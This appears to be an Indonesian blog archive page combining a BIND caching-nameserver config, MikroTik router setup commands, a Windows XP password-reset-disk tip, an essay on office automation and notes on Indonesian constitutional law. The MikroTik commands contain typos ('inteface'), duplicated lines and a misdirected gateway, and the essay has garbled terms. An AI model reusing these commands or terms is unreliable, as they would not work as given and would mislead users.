// named.conf for Red Hat caching-nameserver
//
options {
directory “/var/named”;
dump-file “/var/named/data/cache_dump.db”;
statistics-file “/var/named/data/named_stats.txt”;
/*
* If there is a firewall between you and nameservers you want
* to talk to, you might need to uncomment the query-source
* directive below. Previous versions of BIND always asked
* questions using port 53, but BIND 8.1 uses an unprivileged
* port by default.
*/
// query-source address * port 53;
forwarders {
203.130.193.74;
202.134.0.155;
202.134.2.5;
};
};
//
// a caching only nameserver config
//
controls {
inet 127.0.0.1 allow { localhost; } keys { rndckey; };
};
zone “.” IN {
type hint;
file “named.ca”;
};
zone “localdomain” IN {
type master;
file “localdomain.zone”;
allow-update { none; };
};
zone “localhost” IN {
type master;
file “localhost.zone”;
allow-update { none; };
};
zone “0.0.127.in-addr.arpa” IN {
type master;
file “named.local”;
allow-update { none; };
};
zone “0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.ip6.arpa” IN {
type master;
file “named.ip6.local”;
allow-update { none; };
};
zone “255.in-addr.arpa” IN {
type master;
file “named.broadcast”;
allow-update { none; };
};
zone “0.in-addr.arpa” IN {
type master;
file “named.zero”;
allow-update { none; };
};
include “/etc/rndc.key”;

c. Gateway 192.168.1.1

tambahan :::::>

14 langkah instalasi miktotik pakai speedy

/ip address add interface=ether1 address = 192.168.1.1 netmask= 255.255.255.0
/ip address add interface=ether2 address = 192.168.0.1 netmask= 255.255.255.0
/interface print
/inteface set 0 name=”Public”
/inteface set 1 name=”Lan”
/ip route add gateway=192.168.0.1
/ip dns set primary-dns=203.130.193.74 secondary-dns=202.134.0.155
/ip dns set allow-remote-requests=yes
/ip firewall nat add chain=srcnat out-inteface=Public action=masquerade
/ip firewall nat add chain=dstnat protocol=tcp dst-port=80 action=redirect to-ports=8080
/ip firewall nat add chain=dstnat protocol=tcp dst-port=3128 action=redirect to-ports=8080
/ip firewall nat add chain=dstnat protocol=tcp dst-port=8080 action=redirect to-ports=8080
/ip pool add name=”dhcp-pool” ranges=192.168.0.1-192.168.0.29
/ip dhcp-server add name=”dhcp1? inteface=LAN address-pool=”dhcp-pool” lease-time=3d
/ip dns set allow-remote-requests=yes
/ip firewall nat add chain=srcnat out-inteface=Public action=masquerade
/ip firewall nat add chain=dstnat protocol=tcp dst-port=80 action=redirect to-ports=8080
/ip firewall nat add chain=dstnat protocol=tcp dst-port=3128 action=redirect to-ports=8080
/ip firewall nat add chain=dstnat protocol=tcp dst-port=8080 action=redirect to-ports=8080

Creating pass reset disk for Xp

•April 29, 2009 • Tinggalkan sebuah Komentar

Windows XP allows you to create a password reset disk, just in case you forget the password and can’t login. This is only for computers that are not on a domain. Those that are on a domain may or may not work the same way.

Go to Start->Control Panel->User Accounts and click on your username. Under Related Tasks on the left pane, click Prevent a forgotten password. A wizard will show up. Click next and then insert a floppy disk into your floppy drive and choose to save the reset disk on the floppy.

Enter your current password and then click Next and Finish. The floppy will now contain your encrypted password. If you forget your password, you can just use the Password Reset Wizard to create a new one. Just make sure to create another reset disk once you changed your password. So if you forgot your password and changed it to a new one, create another reset disk by repeating the above procedure again.

Automatisasi kantor

•April 29, 2009 • Tinggalkan sebuah Komentar

Penerapan Komunikasi Digital di Kantor

Pendahuluan

Pengoptimalan pemakaian komputer tunggal (stand-alone computer) telah dilakukan orang dengan membentuk suatu jaringan komputer sehingga penggunaannya untuk keperluan kantor dan pelayanan masyarakat dapat dilakukan dengan sebaik-baiknya. Pekerjaan jaringan komputer tersebut pada dasarnya adalah memindahkan atau mentransmisikan data dari satu komputer kekomputer lain. Aplikasinya terlihat pada kegiatan Internet, LAN (local area network), WAN (nude area network), e-mail, ATM, dan sebagainya. Pada bab ini akan dibahas mengenai komunikasi jaringan informasi yang materinya meliputi aplikasi jaringan komunikasi data, komponen sistem komunikasi data, komunikasi data jaringan, lalu lintas komunikasi, dan diskusi.

A. Aplikasi Jaringan Komunikasi Data

Penghubungan komputer yang berjarak tertentu dengan komputer lain, dilakukan pertama kali pada tahun 1940, ketika Dr. George Stibbitz mengirim data mesin kalkulasi melalui saluran telegraf dari Dartmouth College di New Hampshire ke Bell Laboratories di New York City. Kejadian itu menandai kelahiran “komunikasi data” atau yang kemudian dikenal luas sebagai “komunikasi jaringan informasi”, yaitu pengiriman data dari komputer ke komputer lain yang terpisah secara geografis.

Sejak itu kernajuan-kemajuan dalam teknologi komputer dan teknologi komunikasi telah menghasilkan jaringan komunikasi yang cepat dan peledakan data komunikasi dunia. Data dikirim melalui saluran telepon, melalui satelit, dan dibawa melalui udara oleh microwaves. Tiap bisnis atau rumah dengan sebuah komputer dan sebuah telepon sudah mudah akses pada berbagai keperluan pelayanan komunikasi data, mulai dari surat elektronik dan laporan stok untuk katalog barang eceran dan permainan (gemes). Komputer kita, kita beri nama dan kita dapat berlangganan pada jaringan yang memberikan pelayanan bersangkutan, mulai dari berbagai bentuk jaringan local sampai pada jaringan internasional internet. Komunikasi data merupkan kegiatan industri besar yang terus berkembang hingga sekarang.

Aplikasi prinsip-prinsip dan teknologi komunikasi data secara cepat mengubah kehidupan masyarakat. Berikut ini adalah beberapa cara komunikasi data yang digunakan sekarang.

1. Otomatisasi Kantor

Kantor merupakan tempat: MSI dikembangkan agar kantor dapat mencapai tujuan dan produiktivitas. Persaingan dan peningkatan vol­ume pekerjaan memerlukan MSI agar biaya personel dan kantor dapat diefisienkan. Untuk itu otomasi peralatan MSI sebagai bagian dari otomatisasi kantor dan pabrik mutlak diperlukan.

a. Stasiun Kerja

Kebanyakan kegiatan di tempat kantor di lakukan dengan menggunakan komputer disebut stasiun kerja (workstation). Stasiun kerja di sini diartikan sebagai tempat di mana.biasanya terdapat sebuah microcom­puter dengan aplikasi perangkat lunak atau dalam salu sistem terminal yang berhubungan dengan minicomputer dan mainframe. Tugasnya adalah mengerjakan kegiatan-kegiaran kantor.

Ada juga yang disebut unit pengolahan (departemental computing) yaitu kumpulan stasiun kerja yang bekerja sama dalam suatu jaringan atau yang berhubungan dengan minicomputer yang lebih besar. Stasiun-stasiun kerja tersebut: biasanya mendukung keperluan pengolahan informasi suatu kelompok unit kerja dalam bagian tertentu.

b. Surat Elektronik

Waktu yang digunakan untuk herkomunikasi, khususnya pada telepon, dapat menjadi sangat tidak efisien. Pada kenyataannya orang yang ditelepon sering tidak berada di tempat, sehingga pesan ditinggalkan untuk minta ditelepon. Tetapi waktu telepon tersebut dibalas, penelepon pertama sudah tidak berada di tempat. Mungkin terpaksa meninggalkan pesan lagi. Permainan telepon tersebut menjadi tidak efisien.

Surat elektronik dapat menggantikan fungsi telepon, dengan tidak membuang waktu secara tidak efisien. Surat elektronik adalah penggunaan komputer untuk mengirim pesan, memo, surat, dan lain-lain bentuk korespondensi kantor. Sangat sesuai untuk komunikasi singkat yang tidak memerlukan interaksi personal.

c. Konferensi Elektronik

Walaupun surat elektronik adalah komunikasi satu arah yang paling efektif, seperti pengiriman memo ke kepala bagian misalnya, tetapi konferensi elektronik adalah yang paling efektif bila orang harus bertukar pikiran atau ide pada suatu percakapan yang saling bersambut atau bila pertemuan, tatap muka yang diinginkan tidak mungkin berlangsung.

q Telekonferensi

Kadang-kadang komunikasi tatap muka dalam satu ruangan memang diinginkan, tetapi karena berbagai kendala maka tidak semua orang dapat menghadiri rapat : tersebut. Untuk mengatasi hal ini maka telekonfereiisi dapal: digunakan, waktu rapat. Dengan masing-masing peserta berada pada tempat-tempat yang terpisah, dan masing-masing menghadapi komputer, atau yang tidak dapat berhadapan dengan komputer dapat mempelajari rekamannya pada waktu lain, salah satu cara adalah dengan menginstalasikan stasiun kerja video (video workstations). Stasiun kerja yang biasa dapat ditambah dengan stasiun kerja video sehingga dapat menampilkan komunikasi video yang berwarna dan bersuara. Stasiun kerja video dapat digunakan untuk video, suara, atau data. Di samping perangkat keras yang diperlukan oleh srasiun kerja konvensional, stasiun kerja ini berisikan juga kamera video dan sistem audio. Bila jaringan stasiun kerja video dihubungkan, maka dua atau lebih pemakai dapat berbicara dan melihat satu sama lain pada waktu yang sama.

d. Surat dengan Suara

Surat dengan suara (voice mail) adalah sistem transmisi pesan secara elektronik. yang serupa dengan surat elektronik, dengan perbedannnya pada adanva suara. Ada orang yang merasa lebiih mudah berbicara daripada mengetik pesan, dan untuk itu surat dengan suara dapat digunakan. Pemakai dapat secara mudah memanggil seseorang, pada sembarang waktu dan dapat meninggalkan pesan suara yang disimpan secara digital pada disk magnetic sampai dicari dan diputar kembali oleh penerima. Sistem surat dengan suara lebih kompleks, lebih sukar dikerjakan, dan lebih mahal dari surat elektronik biasa.

e. Transmisi Faksimili

Transmisi faksimili (facsimilel fax) adalah suatu proses dimana teks dan grafik (seperti diokuumen, gambar peta, bagan, dan berita cetak) yang di-scan secara optik, diubah menjadi signal elektronik, ditransmisikan melalui saluran komunikasi, dan direproduksikan pada suatu lokasi yang jauh. Transmisi ini ditemukan tahun 1890 oleh Lexander Bayne yang juga membuat teknik pengiriman gambar melalui saluran telegraf. Dewasa ini, alat transmisi faksimili yang jauh lebih canggih menggunakan komputer dan teknologi komunikasi untuk memperoleh hasil reproduksi yang berkualitas tinggi, kecepatan tinggi, dan “image” yang jelas.

Secara konseprual, alat: pengirim faksimili adalah sejenis alat pengkopi yang mendigitalkan ”image” dan mengirimkan hasil kosong-kosong dan satu-satu ke beberapa lokasi yang jauh. Pada akhir dari saluran komunikasi (biasanya saluran telefon), alat penerima faksimili (facsimile receivetr) menerima arus kosong-kcsong dan satu-satu yang di transmisikan, membuat ”image”, dan mencetakkannya pada kertas dengan menggunakan metode eleklrostatik, thermal, aiau inkjet. Biasanya, baik alat pentransmisi dan alat penerima disatukan dalam satu mesin yang disebut “facsimile transceiver”. Kantor-kantor yang dilengkapi dengan transceiver kompatibel dapat mengirim tiap dokumen kembali atau meneruskannya sesuai kemauan.

f. LAN

Bila individu-individu dan alat-alat yang berbeda terdapat dalam kantor otomatisasi modern akan berkomunikasi satu sama lain, maka antara mereka harus di interkoneksikan. Perkembangan cepat PC dalam organisasi dan pembuatan jaringan Area lokal (local area network / LAN) telah menghasilkan kemampuan yang besar terhadap interkoneksi rersebut.

Karena areanya dalam satu gedung atau antartingkat dalam satu gedung, maka LAN dapat dijalankan dengan menghubungkan komputer-konmputer individual dan peralatan periferal tanpa menggunakan modem atau telepon, Banyak kantor mengunakan LAN sebagai fasilitas komunikasi untuk menjalankan surat elektronik dan penggunaan bersama komputer yang mahal, misalnya penggunaan alat cetak kecepatan tinggi dan hard disk berkapaskas banyak.

Ada LAN yang dilengkapi dengan penggunaan surat dengan suara dan faksimili. Dapat ditambahkan, bahwa kantor menggunakan LAN untuk menghubungkan WP dan komputer personal yang satu dengan lain-lainnya, dan untuk membawa informasi yang ditransferkan dari file bersama dan database bersama.

2. Pemakaian. Umum

Komunikasi data diaplikasikan juga pada kegiatan-kegiatan masyarakat umum. Aplikasi demikian sudah lazim digunakan di negara-negara maju. Berikut ini adalah beberapa pemakaian atau aplikasi komunikasi data pada kegiatan-kegiatan masyarakat umum.

a. Pelayanan Informasi dan Videotex

Pelayanan informasi (information services) memberikan layanan jaringan interaktif kepada pemakai yang mempunyai sebuah komputer terminal atau PC. Pelayanan tersebut mudah digunakan dan dapat akses melalui jenis umum microcomputer. Pelanggan dapat memilih berbagai ragam pelayanan berikut:

1. Pencarian kembali informasi atau “information retrieval” (berita, cuaca, pendidikan di rumah, data keuangan, olahraga, dan lain-lain).

2. Surat elektronik.

3. Komputasi atau penghitungan (bahasa komputer, paket aplikasi, komputer games).

4. Telemonitoring (sistem-sistem keamanan rumah).

5. Belanja di rumah.

6. Pelayanan Bank.

7. Pemesanan perjalanan, teater, restoran, olahraga, dan lain-lain.

b. Bulletin Board

Pelayanan komunikasi model lain adalah Electronic Bulletin Boards yang terkenal di antara pemakai komputer rumah dan penggemar lainnya. Sistem ini menyediakan peralatan bagi pemakainya untuk dapat saling bertukar pesan, pemrograman, nasihat, komentar, dan perangkat lunak. Layanan “on-line” atau BBS (bulletin board system) ini sudah ada juga di Indonesia sejak tahun 1988.

Untuk akses ke electronic bulletin boards yang diperlukan adalah sebuah microcomputer, alat komunikasi telepon, dan modem. Sistem ini umumnya terdiri dari sebuah PC sentral yang diperlengkapi untuk menjawab telepon secara otomatis dan memungkinkan penelepon menghubungi dengan menggunakan komputer masing-masing. Dengan komunikasi antara dua komputer misalnya, maka penelepon dapat mengirim pesan atau membaca pesan yang ditinggalkan untuknya oleh pemakai !ain, dengan biaya yang relatif murah, kita dapat memiiiki komputer PC, modem, perangkat lunak, dan lelepon.

c. Transfer Dana secara Elektronik

Transfer Dana Elektronik (Electronic Funds Transfer/EFT) adalah perpindahan uang secara elektronik di antara rekening Bank, EFT merupakan aplikasi penting dari komunikasi data. Hampir semua transaksi keuangan ditangani secara elektronik. Salah satu perkembangan EFT yang terkenal adalah Automatic Teller Machine (ATM). Dengan beroperasi 24 jam sehari, ATM diprogramkan menggantikan berbagai fungsi teller manusia untuk mengeluarkan uang tunai, menerima de­posit (bila diprogramkan), dan laporan saldo rekening.

Untuk menggunakan ATM, pelanggan Bank harus mempunyai kartu plastik berkode khusus (kartu kredit) dan nomor identifikasi pribadi untuk keperluan keamanan dan kerahasiaan.

d. Konferensi Melalui Komputer

Komunikasi data dapat juga digunakan sebagai cara menghindarkan suatu perjalanan dinas. Hasilnya dapat menghemat biaya dan waktu perjalanan. Komputer Konferensi (Computer Conferencing) menggunakan suatu saluran kerja sama beberapa komputer jarak jauh dan beberapa terminal sehingga pemakai dapat bertukar informasi atau pesan secara langsung dan cepat seperti halnya suatu pertemuan.

e. Akses Database Publik

Salah satu aplikasi khusus teknologi komunikasi data yang bermanfaat adalah akses pada database publik. Terdapat banyak pelayanan jasa yang tersedia untuk memberikan akses demikian, yaitu penyediaan suatu sprektrum informasi yang luas bagi para pemakai. Pemakai tersebur dapat terdiri dari perusahaan-perusahaan atau perorangan, misalnya perusahaan manufaktur. Keuntungan utama bagi para pemakai adalah dapat akses pada data eksternal tanpa perlu memikirkan dan mengelola sendiri sesuatu data yang terbaru (up-to-date), Perusahaan database-lah yang bertanggung jawab terhadap kemutakhiran data tersebut. Pemakai secara mudah hanya perlu menyediakan sebuah komputer, sebuah modem, dan pemahaman mengenai bagaimana menggunakan bahasa pertanyaan database untuk menyelusuri (search) database untuk menemukan data yang di inginkan.

Dari sudut pandang teknik, fasilitas komunikasi harus digunakan bila komputer-komputer, terminal-terminal, atau lain-lain alat pendukung seperti alat cetak yang jeraknya terpisah secara geografis dan harus dihubungkan.

Hukum

•April 29, 2009 • Tinggalkan sebuah Komentar

Sumber-sumber Hukum Tata Negara Indonesia, antara lain :

– Undang-Undang Dasar 1945
UUD 1945 sebagai sumber hukum, yang merupakan hukum dasar tertulis yang mengatur masalah kenegaraan dan merupakan dasar ketentuan-ketentuan lainnya.

– Ketetapan MPR
Dalam Pasal 3 UUD 1945 ditentukan bahwa Majelis Permusyawaratan Rakyat menetapkan Undang-Undang Dasar dan Garis-Garis Besar Haluan Negara. Dengan istilah menetapkan tersebut maka orang berkesimpulan, bahwa produk hukum yang dibentuk oleh MPR disebut Ketetapan MPR.

– Undang-undang/peraturan pemerintah pengganti undang-undang
Undang-undang mengandung dua pengertian, yaitu :
a. undang-undang dalam arti materiel : peraturan yang berlaku umum dan dibuat oleh penguasa, baik pemerintah pusat maupun pemerintah daerah.
b. undang-undang dalam arti formal : keputusan tertulis yang dibentuk dalam arti formal sebagai sumber hukum dapat dilihat pada Pasal 5 ayat (1) dan pasal 20 ayat (1) UUD 1945.

– Peraturan Pemerintah
Untuk melaksanakan undang-undang yang dibentuk oleh Presiden dengan DPR, oleh UUD 1945 kepada presiden diberikan kewenangan untuk menetapkan Peraturan Pemerintah guna melaksanakan undang-undang sebagaimana mestinya. Dalam hal ini berarti tidak mungkin bagi presiden menetapkan Peraturan Pemerintah sebelum ada undang-undangnya, sebaliknya suatu undang-undang tidak berlaku efektif tanpa adanya Peraturan Pemerintah.

– Keputusan Presiden
UUD 1945 menentukan Keputusan Presiden sebagai salah satu bentuk peraturan perundang-undangan. Bentuk peraturan ini baru dikenal tahun 1959 berdasarkan surat presiden no. 2262/HK/1959 yang ditujukan pada DPR, yakni sebagai peraturan perundang-undangan yang dibentuk oleh presiden untuk melaksanakan Penetapan Presiden. Kemudian melalui Ketetapan MPRS No. XX/MPRS/1966, Keputusan Presiden resmi ditetapkan sebagai salah satu bentuk peraturan perundang-undangan menurut UUD 1945. Keputusan Presiden berisi keputusan yang bersifat khusus (einmalig) adalah untuk melaksanakan UUD 1945, Ketetapan MPR yang memuat garis-garis besar dalam bidang eksekutif dan Peraturan Pemerintah.

– Peraturan pelaksana lainnya
Yang dimaksud dengan peraturan pelaksana lainnya adalah seperti Peraturan Menteri, Instruksi Menteri dan lain-lainnya yang harus dengan tegas berdasarkan dan bersumber pada peraturan perundang-undangan yang lebih tinggi.

– Convention (Konvensi Ketatanegaraan)
Konvensi Ketatanegaraan adalah perbuatan kehidupan ketatanegaraan yang dilakukan berulang-ulang sehingga ia diterima dan ditaati dalam praktek ketatanegaraan. Konvensi Ketatanegaraan mempunyai kekuatan hukum yang sama dengan undang-undang, karena diterima dan dijalankan, bahkan sering kebiasaan (konvensi) ketatanegaraan menggeser peraturan-peraturan hukum yang tertulis.

– Traktat
Traktat atau perjanjian yaitu perjanjian yang diadakan dua negara atau lebih. Kalau kita amati praktek perjanjian internasional bebrapa negara ada yang dilakukan 3 (tiga) tahapan, yakni perundingan (negotiation), penandatanganan (signature), dan pengesahan (ratification). Disamping itu ada pula yang dilakukan hanya dua tahapan, yakni perundingan (negotiation) dan penandatanganan (signature).

Kelembagaan Negara Berdasarkan UUD 1945

1. Majelis Permusyawaratan Rakyat (MPR)
2. Presiden dan Wakil Presiden
3. Dewan Pertimbangan Agung (DPA)
4. Dewan Perwakilan Rakyat (DPR)
5. Badan Pemeriksa Keuangan (BPK)
6. Mahkamah Agung (MA)

HUBUNGAN ANTARA LEMBAGA-LEMBAGA NEGARA BERDASARKAN UUD 1945

Hubungan antara MPR – Presiden
MPR sebagai pemegang kekuasaan tertinggi mengangkat presiden. Dalam menjalankan tugas pokok dalam bidang eksekutif (pasal 4(1)) presiden tidak hanya menyelenggarakan pemerintahan negara yang garis-garis besarnya telah ditentukan oleh MPR saja, akan tetapi termasuk juga membuat rencana penyelenggaraan pemerintahan negara. Demikian juga presiden dalam bidang legislatif dijalankan bersama-sama dengan DPR (pasal 5)

Hubungan antara MPR – DPR

Melalui wewenang DPR, MPR mengemudikan pembuatan undang-undang serta peraturan-peraturan lainnya agar undang-undang dan peraturan-peraturan itu sesuai dengan UUD. Melalui wewenang DPR ia juga menilai dan mengawasi wewenang lembaga-lembaga lainnya.

Hubungan DPR – Presiden

Sesudah DPR bersama Presiden menetapkan UU dan RAP/RAB maka didalam pelaksanaan DPR berfungsi sebagai pengawas terhadap pemerintah. Pengawasan DPR terhadap Presiden adalah suatu konsekwensi yang wajar, yang mengandung arti bahwa presiden bertanggung jawab kepada DPR.
Bentuk kerjasama antara presiden dengan DPR diartikan bahwa Presiden tidak boleh mengingkari partner legislatifnya.

Hubungan antara DPR – Menteri-menteri

Menteri tidak dapat dijatuhkan dan diberhentikan oleh DPR, tapi konsekuensi dari tugas dan kedudukannya, Presiden harus memperhatikan sungguh-sungguh suara DPR, para Menteri juga dari pada keberatan-keberatan DPR yang dapat mengakibatkan diberhentikannya Menteri.

Hubungan antara Presiden – Menteri-menteri

Mereka adalah pembantu presiden. Menteri mempunyai pengaruh yang besar terhadap Presiden dalam menentukan politik negara yang menyangkut departemennya. Dalam praktek pemerintahan, Presiden melimpahkan sebagian wewenang kepada menteri-menteri yang berbentuk presidium.

Hubungan antara MA – Lembaga Negara lainnya

Dalam Penjelasan UUD 45 Kekuasaan Kehakiman adalah kekuasaan yang merdeka, artinya terlepas dari pengaruh kekuasaan pemerintah ataupun kekuasaan atau kekuatan lainnya.

Sistem pemerintahan Negara yang ditegaskan dalam UUD 1945 beserta Penjelasannya yaitu :

a. Indonesia ialah Negara yang berdasarkan atas Hukum (rechtsstaat);
Negara Indonesia berdasarkan atas Hukum (rechtsstaat), tidak berdasarkan atas kekuasaan belaka (Machtsstaat).
Mengandung arti bahwa negara, termasuk di dalamnya pemerintah dan lembaga-lembaga negara yang lain dalam melaksanakan tindakan-tindakan apapun, harus dilandasi oleh hukum atau harus dapat dipertanggungjawabkan secara hukum.

b. Sistem Konstitusional, yang berarti bahwa pemerintahan berdasar atas sistem Konstitusi (Hukum Dasar); jadi tidak bersifat kekuasaan yang tidak terbatas (absolutismus);
Sistem ini memberikan ketegasan bahwa cara pengendalian pemerintahan dibatasi oleh ketentuan-ketentuan konstitusi, yang dengan sendirinya juga oleh ketentuan-ketentuan dan hukum lain yang merupakan produk konstitusional, seperti garis besar haluan negara, undang-undang dan sebagainya.

c. Kekuasaan Negara yang tertinggi berada di tangan Majelis Permusyawaratan Rakyat (MPR);
Kedaulatan Rakyat dipegang oleh suatu badan, bernama Majelis Permusyawaratan Rakyat, sebagai penjelmaan seluruh rakyat Indonesia.
Sebagai pemegang kekuasaan tertinggi, MPR mempunyai tugas dan wewenang yang sangat menentukan jalnnya negara dan bangsa, yaitu berupa :

– menetapkan undang-undang dasar;
– menetapkan garis-garis besar dari haluan negara;
– mengangkat presiden dan wakil presiden

d. Presiden ialah Penyelenggara Pemerintah Negara yang tertinggi di bawah MPR;
Penjelasan UUD 1945 menyatakan :
“Di bawah Majelis Permusyawaratan Rakyat, presiden ialah penyelenggara pemerintah negara yang tertinggi. Dalam menjalankan pemerintahan negara, kekuasaan dan tanggung jawab adalah di tangan presiden (concentration of power and responsibility upon the President”. Oleh karena itu presiden adalah mandataris MPR, presidenlah yang memegang tanggung jawab atas jalnnya pemerintahan yang dipercayakan kepadanya dan tanggung jawab itu adalah kepada MPR bukan kepada badan lain.

e. Presiden tidak bertanggung jawab kepada Dewan Perwakilan Rakyat (DPR);
Menurut sistem pemerintahan, presiden tidak bertanggung jawab kepada DPR tetapi presiden bekerja sama dengan dewan. Dalam hal pembuatan undang-undang dan menetapkan Anggaran Pendapatan dan Belanja Negara presiden harus mendapatkan persetujuan DPR.

f. Menteri Negara ialah pembantu Presiden; Menteri Negara tidak bertanggung jawab kepada DPR;
Pengangkatan dan pemberhentian menteri-menteri negara sepenuhnya wewenang presiden. Menteri-menteri bertanggungjawab kepada presiden.

g. Kekuasaan Kepala Negara tidak tak terbatas, karena Kepala Negara harus bertanggung jawab kepada MPR dan kecuali itu ia harus memperhatikan sungguh-sungguh suara DPR;
Penjelasan Undang-Undang Dasar 1945 menyatakan :
“Meskipun kepala negara tidak bertanggung jawab kepada Dewan Perwakilan Rakyat, ia bukan “diktator”, artinya kekuasaan tidak tak terbatas. Kunci sistem ini bahwa kekuasaan presiden tidak tak terbatas ditekankan lagi dalam kunci sistem yang ke 2 sistem Pemerintahan Konstitusional, bukan bersifat absolut dengan menunjukkan fungsi/peranan DPR dan fungsi/peranan para menteri, yang dapat mencegah kemungkinan kemerosotan pemerintahan di tangan presiden ke arah kekuasaan mutlak (absolutisme).

Adapun yang dimaksud dengan UUD 1945 ialah Konstitusi Republik Indonesia yang pertama yang terdiri dari :
a. Pembukaan, meliputi 4 alinea
b. Batang Tubuh atau Isi UUD 1945 meliputi: 16 Bab, 37 Pasal, 4 Pasal Aturan Peralihan dan 2 Aturan Tambahan
c. Penjelasan resmi UUD 1945

KEKUASAAN PEMERINTAHAN NEGARA REPUBLIK INDONESIA MENURUT UUD 1945

Adapun UUD 1945 RI antara lain memuat Bab III yang berjudul : Kekuasaan Pemerintahan Negara. Bab III ini terdiri dari 12 pasal, yaitu pasal 4 sampai dengan pasal 15.
Pasal 4 berbunyi sebagai berikut : Presiden Republik Indonesia memegang Kekuasaan Pemerintahan menurut Undang-undang Dasar; Dalam melakukan kewajibannya Presiden dibantu oleh satu orang Wakil Presiden.
Pasal 5 menentukan : bahwa Presiden memegang kekuasaan membentuk Undang-undang dengan Persetujuan Dewan Perwakilan Rakyat, dan Presiden menetapkan Peraturan Pemeritah untuk menjalankan Undang-undang sebagai mana semestinya. Kemudian menyusul pasal 6 sampai pasal 15.

Kemudian terdapat Bab V yang hanya mempunyai 1 pasal tentang Kementerian Negara. Selanjutnya ada Bab VII dari pasal 19 sampai 22 tentang DPR. Kemudian ada Bab IX tentang Kekuasaan Kehakiman terdiri dari 2 pasal yaitu pasal 24 dan 25.

Dari bab-bab diatas ternyata UUD 1945 tidak membedakan dengan tegas tugas antara kekuasaan eksekutif, kekuasaan legislatif, dan kekuasaan yidikatif seperti Montesquieu dengan Trias Politicanya.

Malahan Bab III Kekuasaan Pemerintahan Negara meliputi kekuasaan legislatif dan kekuasaan eksekutif, termasuk hak-hak prerogatif. Selanjutnya kekuasaan legislatif diatur juga dalam Bab VII mengenai DPR, sedangkan kekuasaan eksekutif juga pada Bab V mengenai Kementerian Negara.

Sumber : http://www.asiamaya.com